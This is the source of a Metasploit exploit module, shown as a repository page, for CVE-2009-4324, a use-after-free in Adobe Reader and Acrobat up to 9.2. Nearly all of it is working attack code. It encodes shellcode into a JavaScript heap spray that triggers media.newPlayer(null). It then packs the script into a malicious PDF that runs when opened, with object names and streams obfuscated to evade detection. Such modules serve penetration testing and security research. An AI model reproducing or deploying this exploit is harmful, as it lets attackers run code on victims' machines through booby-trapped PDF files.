root / modules / exploits / windows / fileformat / adobe_media_newplayer.rb @ 7882
History | View | Annotate | Download (5.1 KB)
| 1 | ##
|
|---|---|
| 2 | # This file is part of the Metasploit Framework and may be subject to
|
| 3 | # redistribution and commercial restrictions. Please see the Metasploit
|
| 4 | # Framework web site for more information on licensing and terms of use.
|
| 5 | # http://metasploit.com/framework/
|
| 6 | ##
|
| 7 | |
| 8 | require 'msf/core'
|
| 9 | require 'zlib'
|
| 10 | |
| 11 | class Metasploit3 < Msf::Exploit::Remote |
| 12 | Rank = GoodRanking |
| 13 | |
| 14 | include Msf::Exploit::FILEFORMAT |
| 15 | |
| 16 | def initialize(info = {}) |
| 17 | super(update_info(info,
|
| 18 | 'Name' => 'Adobe Multimeda Doc.media.newPlayer Use After Free Vulnerability', |
| 19 | 'Description' => %q{ |
| 20 | This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat |
| 21 | Professional versions up to and including 9.2. |
| 22 | },
|
| 23 | 'License' => MSF_LICENSE, |
| 24 | 'Author' =>
|
| 25 | [ |
| 26 | 'unknown', # Found in the wild |
| 27 | # Metasploit version by:
|
| 28 | 'hdm',
|
| 29 | 'pusscat',
|
| 30 | 'jduck'
|
| 31 | ], |
| 32 | 'Version' => '$Revision: 7882 $', |
| 33 | 'References' =>
|
| 34 | [ |
| 35 | [ 'CVE', '2009-4324' ], |
| 36 | [ 'OSVDB', '60980' ] |
| 37 | ], |
| 38 | 'DefaultOptions' =>
|
| 39 | {
|
| 40 | 'EXITFUNC' => 'process', |
| 41 | }, |
| 42 | 'Payload' =>
|
| 43 | {
|
| 44 | 'Space' => 1024, |
| 45 | 'BadChars' => "\x00", |
| 46 | 'DisableNops' => true |
| 47 | }, |
| 48 | 'Platform' => 'win', |
| 49 | 'Targets' =>
|
| 50 | [ |
| 51 | # test results (on Windows XP SP3)
|
| 52 | # reader 7.0.5 - untested
|
| 53 | # reader 7.0.8 - untested
|
| 54 | # reader 7.0.9 - untested
|
| 55 | # reader 7.1.0 - untested
|
| 56 | # reader 7.1.1 - untested
|
| 57 | # reader 8.0.0 - untested
|
| 58 | # reader 8.1.2 - untested
|
| 59 | # reader 8.1.3 - untested
|
| 60 | # reader 8.1.4 - untested
|
| 61 | # reader 8.1.5 - untested
|
| 62 | # reader 8.1.6 - untested
|
| 63 | # reader 9.0.0 - untested
|
| 64 | # reader 9.1.0 - untested
|
| 65 | # reader 9.2 - works (no debugger, no DEP)
|
| 66 | [ 'Adobe Reader Windows Universal (JS Heap Spray)',
|
| 67 | {
|
| 68 | 'Size' => (0x10000/2) |
| 69 | } |
| 70 | ], |
| 71 | ], |
| 72 | 'DisclosureDate' => 'Dec 14 2009', |
| 73 | 'DefaultTarget' => 0)) |
| 74 | |
| 75 | register_options( |
| 76 | [ |
| 77 | OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), |
| 78 | ], self.class)
|
| 79 | |
| 80 | end
|
| 81 | |
| 82 | def exploit |
| 83 | |
| 84 | # Encode the shellcode.
|
| 85 | shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) |
| 86 | |
| 87 | # Make some nops
|
| 88 | nops = Rex::Text.to_unescape(make_nops(4)) |
| 89 | |
| 90 | # Randomize variables
|
| 91 | rand1 = rand_text_alpha(rand(100) + 1) |
| 92 | rand2 = rand_text_alpha(rand(100) + 1) |
| 93 | |
| 94 | script = %Q|
|
| 95 | var #{rand1} = unescape("#{shellcode}"); |
| 96 | var #{rand2} = unescape("#{nops}"); |
| 97 | |
| 98 | while(#{rand2}.length <= #{target['Size']}) #{rand2}+=#{rand2}; |
| 99 | #{rand2}=#{rand2}.substring(0,#{target['Size']} - #{rand1}.length); |
| 100 | |
| 101 | memory=new Array(); |
| 102 | |
| 103 | for(i=0;i<0x2000;i++) {
|
| 104 | memory[i]= #{rand2} + #{rand1}; |
| 105 | } |
| 106 | |
| 107 | util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
|
| 108 | util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
|
| 109 | try {this.media.newPlayer(null);} catch(e) {}
|
| 110 | util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
|
| 111 | |
|
| 112 | |
| 113 | # Create the pdf
|
| 114 | pdf = make_pdf(script) |
| 115 | |
| 116 | print_status("Creating '#{datastore['FILENAME']}' file...")
|
| 117 | |
| 118 | file_create(pdf) |
| 119 | |
| 120 | end
|
| 121 | |
| 122 | |
| 123 | def RandomNonASCIIString(count) |
| 124 | result = ""
|
| 125 | count.times do
|
| 126 | result << (rand(128) + 128).chr |
| 127 | end
|
| 128 | result |
| 129 | end
|
| 130 | |
| 131 | def ioDef(id) |
| 132 | "%d 0 obj" % id
|
| 133 | end
|
| 134 | |
| 135 | def ioRef(id) |
| 136 | "%d 0 R" % id
|
| 137 | end
|
| 138 | |
| 139 | |
| 140 | #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
|
| 141 | def nObfu(str) |
| 142 | result = ""
|
| 143 | str.scan(/./u) do |c| |
| 144 | if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' |
| 145 | result << "#%x" % c.unpack("C*")[0] |
| 146 | else
|
| 147 | result << c |
| 148 | end
|
| 149 | end
|
| 150 | result |
| 151 | end
|
| 152 | |
| 153 | |
| 154 | def ASCIIHexWhitespaceEncode(str) |
| 155 | result = ""
|
| 156 | whitespace = ""
|
| 157 | str.each_byte do |b|
|
| 158 | result << whitespace << "%02x" % b
|
| 159 | whitespace = " " * (rand(3) + 1) |
| 160 | end
|
| 161 | result << ">"
|
| 162 | end
|
| 163 | |
| 164 | |
| 165 | def make_pdf(js) |
| 166 | |
| 167 | xref = [] |
| 168 | eol = "\x0d\x0a"
|
| 169 | endobj = "endobj" << eol
|
| 170 | |
| 171 | # Randomize PDF version?
|
| 172 | pdf = "%PDF-1.5" << eol
|
| 173 | pdf << "%" << RandomNonASCIIString(4) << eol |
| 174 | xref << pdf.length |
| 175 | pdf << ioDef(1) << nObfu("<</Type/Catalog/Outlines ") << ioRef(2) << nObfu("/Pages ") << ioRef(3) << nObfu("/OpenAction ") << ioRef(5) << ">>" << endobj |
| 176 | xref << pdf.length |
| 177 | pdf << ioDef(2) << nObfu("<</Type/Outlines/Count 0>>") << endobj |
| 178 | xref << pdf.length |
| 179 | pdf << ioDef(3) << nObfu("<</Type/Pages/Kids[") << ioRef(4) << nObfu("]/Count 1>>") << endobj |
| 180 | xref << pdf.length |
| 181 | pdf << ioDef(4) << nObfu("<</Type/Page/Parent ") << ioRef(3) << nObfu("/MediaBox[0 0 612 792]>>") << endobj |
| 182 | xref << pdf.length |
| 183 | pdf << ioDef(5) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(6) + ">>" << endobj |
| 184 | xref << pdf.length |
| 185 | compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) |
| 186 | pdf << ioDef(6) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol |
| 187 | pdf << "stream" << eol
|
| 188 | pdf << compressed << eol |
| 189 | pdf << "endstream" << eol
|
| 190 | pdf << endobj |
| 191 | xrefPosition = pdf.length |
| 192 | pdf << "xref" << eol
|
| 193 | pdf << "0 %d" % (xref.length + 1) << eol |
| 194 | pdf << "0000000000 65535 f" << eol
|
| 195 | xref.each do |index|
|
| 196 | pdf << "%010d 00000 n" % index << eol
|
| 197 | end
|
| 198 | pdf << "trailer" << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(1) << ">>" << eol |
| 199 | pdf << "startxref" << eol
|
| 200 | pdf << xrefPosition.to_s() << eol |
| 201 | pdf << "%%EOF" << eol
|
| 202 | |
| 203 | end
|
| 204 | |
| 205 | end
|